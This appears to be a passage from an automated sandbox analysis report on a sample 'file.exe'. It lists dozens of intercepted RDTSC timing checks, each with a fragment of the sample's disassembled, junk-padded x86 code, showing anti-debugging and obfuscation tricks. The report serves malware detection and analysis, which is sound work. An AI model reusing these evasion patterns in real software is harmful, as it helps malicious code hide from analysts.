00007FBA4947B578h 0x00000073 push ebx 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A933D second address: 10A936D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA4947DCF8h 0x00000009 popad 0x0000000a jmp 00007FBA4947DCF0h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A936D second address: 10A937B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DAF68 second address: 10DAF6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB0DC second address: 10DB0E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB0E2 second address: 10DB0EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB0EB second address: 10DB0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB0EF second address: 10DB0F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB0F3 second address: 10DB0F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB21B second address: 10DB228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBA4947DCE6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB398 second address: 10DB3B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FBA4947B56Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB3B0 second address: 10DB3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB3B5 second address: 10DB3D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FBA4947B566h 0x0000000b jmp 00007FBA4947B570h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB3D5 second address: 10DB3DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB763 second address: 10DB77C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B575h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB77C second address: 10DB784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DB784 second address: 10DB788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DBA69 second address: 10DBA6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DBA6E second address: 10DBA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DBA74 second address: 10DBA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FBA4947DCE6h 0x0000000d jnc 00007FBA4947DCE6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DBBDD second address: 10DBBE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DBBE1 second address: 10DBBE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DBD40 second address: 10DBD76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B575h 0x00000007 jmp 00007FBA4947B575h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FBA4947B566h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DBD76 second address: 10DBD80 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBA4947DCE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DBD80 second address: 10DBD9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FBA4947B566h 0x00000009 push edx 0x0000000a pop edx 0x0000000b ja 00007FBA4947B566h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 jo 00007FBA4947B566h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A791B second address: 10A7924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A7924 second address: 10A7937 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FBA4947B566h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DC670 second address: 10DC674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DC8EE second address: 10DC912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DC912 second address: 10DC916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DC916 second address: 10DC923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DCABA second address: 10DCACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FBA4947DCE6h 0x0000000a jbe 00007FBA4947DCE6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DCDB8 second address: 10DCDBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DCDBC second address: 10DCDCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FBA4947DCE8h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DCDCE second address: 10DCDD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E05A8 second address: 10E05AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B345A second address: 10B3461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B3461 second address: 10B3466 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E65B4 second address: 10E65B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E65B8 second address: 10E65DC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBA4947DCE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FBA4947DCEEh 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E65DC second address: 10E65F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBA4947B571h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E65F7 second address: 10E6613 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCF8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6764 second address: 10E676E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBA4947B566h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E676E second address: 10E6785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FBA4947DCEDh 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6921 second address: 10E6927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6927 second address: 10E692D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6E5A second address: 10E6E6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 js 00007FBA4947B566h 0x0000000b jns 00007FBA4947B566h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6E6F second address: 10E6E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7109 second address: 10E7113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBA4947B566h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7113 second address: 10E711F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E711F second address: 10E7142 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B578h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8E74 second address: 10E8E7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8E7A second address: 10E8E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8E7E second address: 10E8E82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E8FF8 second address: 10E8FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9A68 second address: 10E9A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9A6D second address: 10E9A87 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jc 00007FBA4947B566h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007FBA4947B566h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9B51 second address: 10E9B57 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9C11 second address: 10E9C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9C1D second address: 10E9C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9EF8 second address: 10E9EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E9EFC second address: 10E9F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EA118 second address: 10EA11D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EA650 second address: 10EA654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EA654 second address: 10EA658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EA658 second address: 10EA666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EA666 second address: 10EA675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B56Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB0FE second address: 10EB108 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBA4947DCE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC121 second address: 10EC135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA4947B56Fh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC135 second address: 10EC13B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC13B second address: 10EC14A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC14A second address: 10EC1D5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBA4947DCECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FBA4947DCE8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 jmp 00007FBA4947DCF7h 0x0000002a push 00000000h 0x0000002c jmp 00007FBA4947DCF1h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 xor esi, 5C4D80C8h 0x0000003a pop edi 0x0000003b xchg eax, ebx 0x0000003c jo 00007FBA4947DCFDh 0x00000042 jmp 00007FBA4947DCF7h 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push ecx 0x0000004d pop ecx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC1D5 second address: 10EC1D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC1D9 second address: 10EC1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EC9F3 second address: 10ECA0A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA4947B56Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ED616 second address: 10ED61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ECA0A second address: 10ECA0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ED61A second address: 10ED61E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ECA0E second address: 10ECA14 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ED61E second address: 10ED624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ED624 second address: 10ED639 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FBA4947B568h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EDFA1 second address: 10EDFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EDFA8 second address: 10EDFAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EEA95 second address: 10EEAE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov ebx, 6E513DF6h 0x00000010 add edi, dword ptr [ebp+122D1932h] 0x00000016 popad 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+1245B953h], ebx 0x0000001f sub dword ptr [ebp+122D21A3h], eax 0x00000025 push 00000000h 0x00000027 movzx esi, cx 0x0000002a xchg eax, ebx 0x0000002b jns 00007FBA4947DCEEh 0x00000031 push esi 0x00000032 jl 00007FBA4947DCE6h 0x00000038 pop esi 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d jno 00007FBA4947DCE6h 0x00000043 pop eax 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EF559 second address: 10EF5FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FBA4947B575h 0x0000000b jng 00007FBA4947B566h 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007FBA4947B568h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e clc 0x0000002f call 00007FBA4947B575h 0x00000034 xor dword ptr [ebp+122D1E2Ah], edi 0x0000003a pop esi 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push esi 0x00000040 call 00007FBA4947B568h 0x00000045 pop esi 0x00000046 mov dword ptr [esp+04h], esi 0x0000004a add dword ptr [esp+04h], 0000001Ch 0x00000052 inc esi 0x00000053 push esi 0x00000054 ret 0x00000055 pop esi 0x00000056 ret 0x00000057 push edi 0x00000058 mov dword ptr [ebp+122D5670h], edx 0x0000005e pop esi 0x0000005f push 00000000h 0x00000061 mov edi, dword ptr [ebp+122D18F7h] 0x00000067 xchg eax, ebx 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FBA4947B56Eh 0x0000006f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F329C second address: 10F32A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EF29C second address: 10EF2A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F63B2 second address: 10F63B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F63B8 second address: 10F63E3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBA4947B568h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FBA4947B57Ch 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F63E3 second address: 10F63E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F63E9 second address: 10F63ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F63ED second address: 10F645C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FBA4947DCE8h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 sub dword ptr [ebp+122D342Bh], esi 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007FBA4947DCE8h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 or dword ptr [ebp+12451CD2h], ecx 0x0000004b mov edi, ebx 0x0000004d push 00000000h 0x0000004f sub dword ptr [ebp+12454FA7h], ebx 0x00000055 xchg eax, esi 0x00000056 je 00007FBA4947DCEEh 0x0000005c push ebx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F73D5 second address: 10F73D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
